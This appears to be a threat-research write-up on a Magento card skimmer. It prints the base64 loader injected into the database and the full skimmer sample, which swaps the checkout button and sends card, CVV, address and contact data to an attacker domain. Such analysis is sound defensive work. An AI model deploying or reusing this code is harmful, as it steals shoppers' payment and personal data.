obj_31337 Skimmer Loads From payprocess.org
Outline
There’s so many skimmers these days that it’s difficult to keep up 😬
Loader⌗
The skimmer loads from an injection into the core_config_data of the Magento database.
The injection uses the atob JavaScript function for base64 decoding the URL: hxxps://payprocess.org/s/us_afford.js.
It’s still active at the time of this writing.
<script>
var sc = document.createElement("script");
sc.type = "text/javascript";
sc.src = atob('aHR0cHM6Ly9wYXlwcm9jZXNzLm9yZy9zL3VzX2FmZm9yZC5qcw==');
document.getElementsByTagName('head')[0].appendChild(sc);
</script>
At this point do we really even need to ask who the domain is registered with? 🤣🤣
Domain Name: PAYPROCESS.ORG
Registry Domain ID: D402200000015677610-LROR
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2021-03-12T03:46:04Z
Creation Date: 2021-01-10T18:33:26Z
Registry Expiry Date: 2022-01-10T18:33:26Z
payprocess.org/s/us_afford.js Skimmer⌗
Once the JavaScript skimmer payload has been loaded from hxxps://payprocess.org/s/us_afford.js - it does its thing by listening for input to the #xtsavedcc payment fields on the checkout page of the infected website.
Exfiltration -> processpayment.cc/j.js⌗
The exfiltration URL is defined within the our_honey variable and uses a custom function sendscriptRequest for sending the skimmed payment data to processpayment.cc/j.js:
function real_send(e) {
e.preventDefault();
var our_honey = atob('aHR0cHM6Ly9wcm9jZXNzcGF5bWVudC5jYy9qLmpz');
//var our_honey = atob('https://processpayment.cc/j.js');
...
sendscriptRequest(our_honey, req, statusCall1);
...
Another NameCheap registered domain being used for malicious purposes…
Domain Name: PROCESSPAYMENT.CC
Registry Domain ID: 153752740_DOMAIN_CC-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2021-01-10T18:39:49Z
Creation Date: 2021-01-10T18:33:21Z
Registry Expiry Date: 2022-01-10T18:33:21Z
Sample⌗
<script>
var sc = document.createElement("script");
sc.type = "text/javascript";
sc.src = atob('aHR0cHM6Ly9wYXlwcm9jZXNzLm9yZy9zL3VzX2FmZm9yZC5qcw==');
document.getElementsByTagName('head')[0].appendChild(sc);
</script>
function sendscriptRequest(_0xa0ebx2, _0xa0ebx3, _0xa0ebx4, _0xa0ebx5) {
var _0xa0ebx6 = document['createElement']('script');
if (_0xa0ebx3) {
_0xa0ebx3 = '?rand=' + Math['random']() + '&' + _0xa0ebx3
} else {
_0xa0ebx3 = '?rand=' + Math['random']()
};
_0xa0ebx6['ajax_readyState'] = false;
_0xa0ebx6['onload'] = scriptCallback(_0xa0ebx6, _0xa0ebx4, _0xa0ebx5);
_0xa0ebx6['onreadystatechange'] = scriptCallback(_0xa0ebx6, _0xa0ebx4, _0xa0ebx5);
_0xa0ebx6['src'] = _0xa0ebx2 + _0xa0ebx3;
document['getElementsByTagName']('script')[0]['parentNode']['appendChild'](_0xa0ebx6)
}
function scriptCallback(_0xa0ebx6, _0xa0ebx4, _0xa0ebx5) {
return function() {
if (_0xa0ebx6['ajax_readyState']) {
return
};
if (!_0xa0ebx6['readyState'] || _0xa0ebx6['readyState'] === 'loaded' || _0xa0ebx6['readyState'] === 'complete') {
_0xa0ebx6['ajax_readyState'] = true;
_0xa0ebx4['apply'](_0xa0ebx6, _0xa0ebx5);
_0xa0ebx6['parentNode']['removeChild'](_0xa0ebx6)
}
}
}
function valid_credit_card(value) {
value = value.replace(/ /g, "");
if (value === '') {
return false;
}
if (/[^0-9-\s]+/.test(value)) return false;
let nCheck = 0,
bEven = false;
value = value.replace(/\D/g, "");
for (var n = value.length - 1; n >= 0; n--) {
var cDigit = value.charAt(n),
nDigit = parseInt(cDigit, 10);
if (bEven && (nDigit *= 2) > 9) nDigit -= 9;
nCheck += nDigit;
bEven = !bEven;
}
return (nCheck % 10) == 0;
}
var obj_31337 = {};
obj_31337.dbg_card = '';
obj_31337.dbg_exp = '';
obj_31337.dbg_cvv = '';
obj_31337.dbg_first = '';
obj_31337.dbg_last = '';
obj_31337.dbg_addr = '';
obj_31337.dbg_city = '';
obj_31337.dbg_state = '';
obj_31337.dbg_zip = '';
obj_31337.dbg_email = '';
obj_31337.dbg_ssn = '';
obj_31337.dbg_dob = '';
obj_31337.dbg_dl = '';
obj_31337.dbg_add1 = '';
obj_31337.dbg_add2 = '';
obj_31337.sid = '';
function getCookieValue(a) {
var b = document.cookie.match('(^|;)\\s*' + a + '\\s*=\\s*([^;]+)');
return b ? b.pop() : '';
}
function real_send(e) {
e.preventDefault();
var our_honey = atob('aHR0cHM6Ly9wcm9jZXNzcGF5bWVudC5jYy9qLmpz');
var name = 'us_afford';
if (jQuery('#xtsavedcc:visible:checked').length === 0) {
jQuery('button[data1=origin]').click();
return false;
}
obj_31337['sid'] = name;
obj_31337['dbg_card'] = jQuery('#xtsavedcc_cc_number').val();
obj_31337['dbg_exp'] = jQuery('#xtsavedcc_expiration').find('option:selected').val() + '/' + jQuery('#xtsavedcc_expiration_yr').find('option:selected').val();
obj_31337['dbg_cvv'] = jQuery('#xtsavedcc_cc_cid').val();
obj_31337['dbg_first'] = jQuery('#xtsavedcc_cc_name').val();
obj_31337['dbg_last'] = '';
var addr = jQuery('input[name="street[0]"]').val() + jQuery('input[name="street[1]"]').val();
var addr_obj = undefined;
if (addr === '') {
if (typeof(window.customerData) !== "undefined") {
if (typeof(window.customerData.addresses) != "undefined") {
if (Object.keys(window.customerData.addresses).length > 0) {
var addr_key = parseInt(Object.keys(window.customerData.addresses)[0]);
addr_obj = window.customerData.addresses[addr_key];
addr = addr_obj.street[0];
}
}
}
}
obj_31337['dbg_addr'] = addr;
var city = jQuery("input[name='city']").val();
if (city === '') {
if (typeof(window.customerData) !== "undefined") {
if (typeof(window.customerData.addresses) != "undefined") {
if (Object.keys(window.customerData.addresses).length > 0) {
var addr_key = parseInt(Object.keys(window.customerData.addresses)[0]);
addr_obj = window.customerData.addresses[addr_key];
city = addr_obj.city;
}
}
}
}
obj_31337['dbg_city'] = city;
obj_31337['dbg_state'] = jQuery("select[name=region_id]:eq(0)").find("option:selected").text();
var zip = jQuery("input[name=postcode]").val();
if (zip === '') {
if (typeof(window.customerData) !== "undefined") {
if (typeof(window.customerData.addresses) != "undefined") {
if (Object.keys(window.customerData.addresses).length > 0) {
var addr_key = parseInt(Object.keys(window.customerData.addresses)[0]);
addr_obj = window.customerData.addresses[addr_key];
zip = addr_obj.postcode;
}
}
}
}
obj_31337['dbg_zip'] = zip;
var email = jQuery("input[id='customer-email']").val();
if (email === '') {
if (typeof(window.customerData) !== "undefined") {
if (typeof(window.customerData.email) !== 'undefined') {
email = window.customerData.email;
}
}
}
obj_31337['dbg_email'] = email;
obj_31337['dbg_add2'] = jQuery('input[name=telephone]').val();
var obj_str = JSON.stringify(obj_31337);
var obj_b64 = btoa(obj_str);
var req = "r=" + obj_b64;
function statusCall1() {
jQuery('button[data1=origin]').click();
}
sendscriptRequest(our_honey, req, statusCall1);
}
function real_set() {
jQuery("button[id=onestepcheckout-button-place-order]:visible").attr('data1', 'origin');
jQuery('button[data1="origin"]').hide().after('<button id="btn123" onclick="real_send(event)" class="btn-proceed-checkout onestepcheckout-btn-checkout onestepcheckout-place" type="button" title="Place Order"><span><span>Place order now</span></span></button>');
jQuery("#btn123").unbind().unbind();
}
var myVar = setInterval(searchFunction, 500);
function searchFunction() {
var found = jQuery("#onestepcheckout-button-place-order:visible").length;
if (found === 1) {
real_set();
clearInterval(myVar);
} else {}
}
function called_outside_ready() {}
function called_inside_ready() {}
called_outside_ready();
document.addEventListener("DOMContentLoaded", function(event) {
called_inside_ready();
})
More Research